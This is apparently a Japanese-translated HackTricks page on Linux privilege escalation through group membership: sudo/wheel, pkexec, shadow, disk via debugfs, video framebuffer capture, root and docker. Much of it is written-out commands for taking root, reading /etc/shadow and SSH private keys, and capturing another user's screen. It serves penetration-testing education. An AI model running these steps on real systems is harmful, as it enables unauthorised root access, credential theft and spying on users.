9.8 KiB
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}
Sudo/Admin Groups
PE - Method 1
時々、 デフォルトで(またはいくつかのソフトウェアが必要とするために) /etc/sudoers ファイル内にこれらの行のいくつかを見つけることができます:
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# Allow members of group admin to execute any command
%admin ALL=(ALL:ALL) ALL
これは、sudoまたはadminグループに属する任意のユーザーがsudoとして何でも実行できることを意味します。
この場合、rootになるには、単に次を実行すればよい:
sudo su
PE - Method 2
すべてのsuidバイナリを見つけ、バイナリPkexecがあるかどうかを確認します:
find / -perm -4000 2>/dev/null
もしバイナリ pkexec が SUID バイナリであり、あなたが sudo または admin に属している場合、pkexec を使用して sudo としてバイナリを実行できる可能性があります。次の内容を確認してください:
cat /etc/polkit-1/localauthority.conf.d/*
そこでは、どのグループがpkexecを実行することを許可されているか、そしてデフォルトでいくつかのLinuxに表示されるグループがsudoまたはadminであるかを見つけることができます。
rootになるには、次のコマンドを実行できます:
pkexec "/bin/sh" #You will be prompted for your user password
もしpkexecを実行し、このエラーが表示された場合:
polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie
==== AUTHENTICATION FAILED ===
Error executing command as another user: Not authorized
権限がないからではなく、GUIなしで接続されていないからです。この問題の回避策があります: https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903。2つの異なるsshセッションが必要です:
{% code title="session1" %}
echo $$ #Step1: Get current PID
pkexec "/bin/bash" #Step 3, execute pkexec
#Step 5, if correctly authenticate, you will have a root session
{% endcode %}
{% code title="session2" %}
pkttyagent --process <PID of session1> #Step 2, attach pkttyagent to session1
#Step 4, you will be asked in this session to authenticate to pkexec
{% endcode %}
Wheel Group
時々、デフォルトで /etc/sudoers ファイル内にこの行を見つけることができます:
%wheel ALL=(ALL:ALL) ALL
これは、wheelグループに属する任意のユーザーがsudoとして何でも実行できることを意味します。
この場合、rootになるには、単に次を実行すればよい:
sudo su
Shadow Group
shadow グループのユーザーは /etc/shadow ファイルを 読む ことができます:
-rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow
So, read the file and try to crack some hashes.
ディスクグループ
この特権はほぼ ルートアクセスと同等 であり、マシン内のすべてのデータにアクセスできます。
ファイル: /dev/sd[a-z][1-9]
debugfs /dev/sda1
debugfs: cd /root
debugfs: ls
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow
注意してほしいのは、debugfsを使用するとファイルを書き込むこともできるということです。例えば、/tmp/asd1.txt
を/tmp/asd2.txt
にコピーするには、次のようにします:
debugfs -w /dev/sda1
debugfs: dump /tmp/asd1.txt /tmp/asd2.txt
しかし、rootが所有するファイル(例えば/etc/shadow
や/etc/passwd
)に書き込もうとすると、"Permission denied"エラーが発生します。
Video Group
コマンドw
を使用すると、システムにログインしているユーザーを見つけることができ、次のような出力が表示されます:
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
yossi tty1 22:16 5:13m 0.05s 0.04s -bash
moshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash
tty1は、ユーザーyossiが物理的にマシンのターミナルにログインしていることを意味します。
videoグループは、画面出力を表示するアクセス権を持っています。基本的に、画面を観察することができます。そのためには、画面上の現在の画像を生データで取得し、画面が使用している解像度を取得する必要があります。画面データは/dev/fb0
に保存でき、この画面の解像度は/sys/class/graphics/fb0/virtual_size
で見つけることができます。
cat /dev/fb0 > /tmp/screen.raw
cat /sys/class/graphics/fb0/virtual_size
生の画像を開くには、GIMPを使用し、screen.raw
ファイルを選択し、ファイルタイプとしてRaw image dataを選択します:
次に、幅と高さを画面で使用されているものに変更し、異なる画像タイプを確認して(画面をより良く表示するものを選択します):
ルートグループ
デフォルトでは、ルートグループのメンバーは、サービスの設定ファイルやライブラリファイル、または特権昇格に使用できる他の興味深いものを変更するアクセス権を持っているようです...
ルートメンバーが変更できるファイルを確認する:
find / -group root -perm -g=w 2>/dev/null
Docker Group
ホストマシンのルートファイルシステムをインスタンスのボリュームにマウントできます。インスタンスが起動すると、すぐにそのボリュームにchroot
をロードします。これにより、実質的にマシン上でルート権限を得ることができます。
{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %}
{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %}
lxc/lxd Group
Trickestを使用して、世界で最も高度なコミュニティツールによって駆動されるワークフローを簡単に構築し、自動化します。
今すぐアクセスを取得:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}
{% hint style="success" %}
AWSハッキングを学び、練習する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、練習する:HackTricks Training GCP Red Team Expert (GRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- 💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。